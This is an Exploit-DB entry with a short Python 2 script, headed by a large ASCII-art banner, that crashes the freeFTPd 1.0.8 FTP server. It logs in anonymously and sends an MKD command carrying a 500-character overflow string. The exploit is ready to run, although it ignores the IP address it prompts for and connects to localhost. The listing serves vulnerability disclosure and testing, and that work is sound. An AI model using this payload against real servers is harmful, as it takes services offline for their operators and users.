freeFTPd 1.0.8 - 'mkd' Denial of Service

EDB-ID:

40647

CVE:

N/A


Platform:

Windows

Published:

2016-10-31

from ftplib import FTP

print '''


                `,;'++';,`                   
             `'++++++++++++++++;`                 
            .+++++++++++++++++++++++'`               
           ;++++++:`      `:++++++:              
          '++++'`  , +`. :; .``   .'++++;             
         :++++, '+ `+.+.+`+':+:+ +:` + :++++,            
        ++++,  `+ +`+.+`+':+.+ +:'.+.  :++++            
       ,+++;    +` +:':+`+',+`+,++.+:+ +, '+++.           
       '+++` `++  ;+ ,+:'; ,: ;;+`++ +.+`+.  `+++;          
      +++; `: ++'  +   '+++  :++;++,+: +  '+++          
      +++,  ++' ,+    .;+++++',`   : + ',+  :+++         
     +++` ++ +:+ +:  .+++++++++++++++;  : ++'+,,`,+++         
     +++` `+;.+'`  '++++++++++++++++++++.  ;+;+:.+` .+++        
    '++` ++ +,.` '++++++++++++++++++++++++.  +;.+`+ ,++;        
    :++, +:++`' ,+++++++++++++''++++++++++++  `+.+:  :++.       
    ++; . +:+: +++++++++'.     `;++++++++. .+' ++ +++       
   +++ ;++ +: ++++++++,        .+++++++; ;:+;+  +++       
   :++ ;+,++ `+++++++,          `++++++' +,+,.+ `++.      
   ++: `+`+'. ++++++'            ;+++++' +`;++ '++      
  '++  ,+,' ++++++,             .+++++; ++   ++:      
  ++.  ' + ++++++`               +++++. `  '+.:++      
  ;++ +; +  ;+++++`                +++++  :++ ; ++:     
  ++, '++  `+++++,                `+++++ +` `. :++     
 ,++ ` ;+: +++++'                 :++++`  ,+ ++`     
 ++; .+++` .+++++                  +++++ '++:: ++'     
 ++` ;+':: +++++.                   ++++` '`+++`.++     
 .++  `++ +++++                   '++++ +:  ++`    
 '++ `++; '++++`                    ++++    ++;    
 ++, +.,;: ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++:   
 ++` `+++``+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
 ++ +;,` ;++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
`++ ,'+++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 
,++ `++'+ ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::;+++++:
;++ `.,.                                 +++++
+++    '..':     ,++'`       ,+++`             `++++
+++ +;+` ++++:    ++++++'      ++++++'             ++++
+++ :.'`; ++++:    ++`  :+,     ++`  ,+:             ++++
'++ `+++. ++++;    :    +     :    +            ,++++
;++  :` ++++'                             `+++++
,++ `+;;+ +++++ ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; :;;;;;;;;;;;;;;++++++.
`++ ++,+ +++++ :+++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++' 
 ++ ` `, ;++++  ++++++++++++++++++++++++++++++++++++: ++++++++++++++++++++ 
 ++` .+++.`++++: ++++++++++++++++++++++++++++++++++++ `++++++++++++++++++,  
 ++: ','+: +++++ :+++++,,,,,,,,,,,,,,,,,,,,,,,,;+++++ ++++:,:,,:,,+++,.   
 ;++ +:`, '++++` +++++.            +++++` ++++ '.+' ++,    
 ++  +++ +++++ :+++++           ++++++ ;++++ ++.+ ++     
 ++, ';`+' +++++` ++++++          ++++++  ++++` + +. :++     
 '++ :++;, .+++++  ++++++`         ++++++, +++++    ++:     
 `++ +` :+, +++++: .++++++'       :++++++; .++++. +`  `++     
  ++' ;++` `+++++` ,+++++++'`     :+++++++;  +++++ :++` +++     
  ,++ ,:  + '+++++  .++++++++++';:;++++++++++:  +++++   ;+' ++`     
  +++  :+' ++++++  ++++++++++++++++++++++`  +++++. ;+` , +++      
  ,++ :++`;+` ++++++`  :++++++++++++++++++'  +++++' `+,+;`;`++.      
   +++ : ++.+ `++++++:  :++++++++++++++;  ,+++++'  ++`+ +++      
   `++, +;+` `+++++++`  `:++++++++:`   ++++++' ++ ,+; ;++`      
   '++ :+ `' ++++++++`        `+++++++; +++  ;`++;       
    +++  `:`+ +++++++++:      ,++++++++,  +,++  +++       
    +++  +++;' :+++++++++++';::;'+++++++++++  ;+ +,' +++        
    ,+++ +++.+.: +++++++++++++++++++++++++. '' ++ + +++`        
     ;++' ` +`+`;. `+++++++++++++++++++++,  :,+,:+: +++,        
     ;+++ ,++:'++`  ,+++++++++++++++;  ++ .++ ` +++:         
      ;+++  + +`+ +;  .;'++++':`   ++.+':++  +++:         
      :+++` `++, :;+`+;      ::+ +,+`+.  .+++,          
       .+++' `,  +`:'+ +,+` +, +:+.++:';+ ++ ++++`          
        ++++.  +':++: +;+` ': +:+ +.+ +'  :++++           
        :++++.  . +,+,;+'` '; :'+`+'+  ,++++,            
         +++++:  ` +`+'` '; `++`   ;++++'             
          `++++++:     ;' +  :++++++`             
           `+++++++':.    `,:+++++++'               
            .++++++++++++++++++++++.                
              `:'++++++++++++',                  

        ##############################################
        #  Created: ScrR1pTK1dd13         #
        #  Name: Greg Priest            #
        #  Mail: ScrR1pTK1dd13.slammer@gmail.com  # 
        ##############################################


# Exploit Title: FreeFTPD_1.0.8_mkd_command_DoS_Exploit
# Date: 2016.10.30
# Exploit Author: Greg Priest
# Version: FreeFTPD_1.0.8
# Tested on: Windows XP, Windows 7 x64

'''

ftp_ip = raw_input("FTP server IP:")
killerstring = 'A' * 500
ftp = FTP('127.0.0.1')
ftp.login('anonymous', 'h4ck3r@h4ck3r.net')
print ftp.login
print "SERVER KILLED"
FTP.mkd(ftp, killerstring)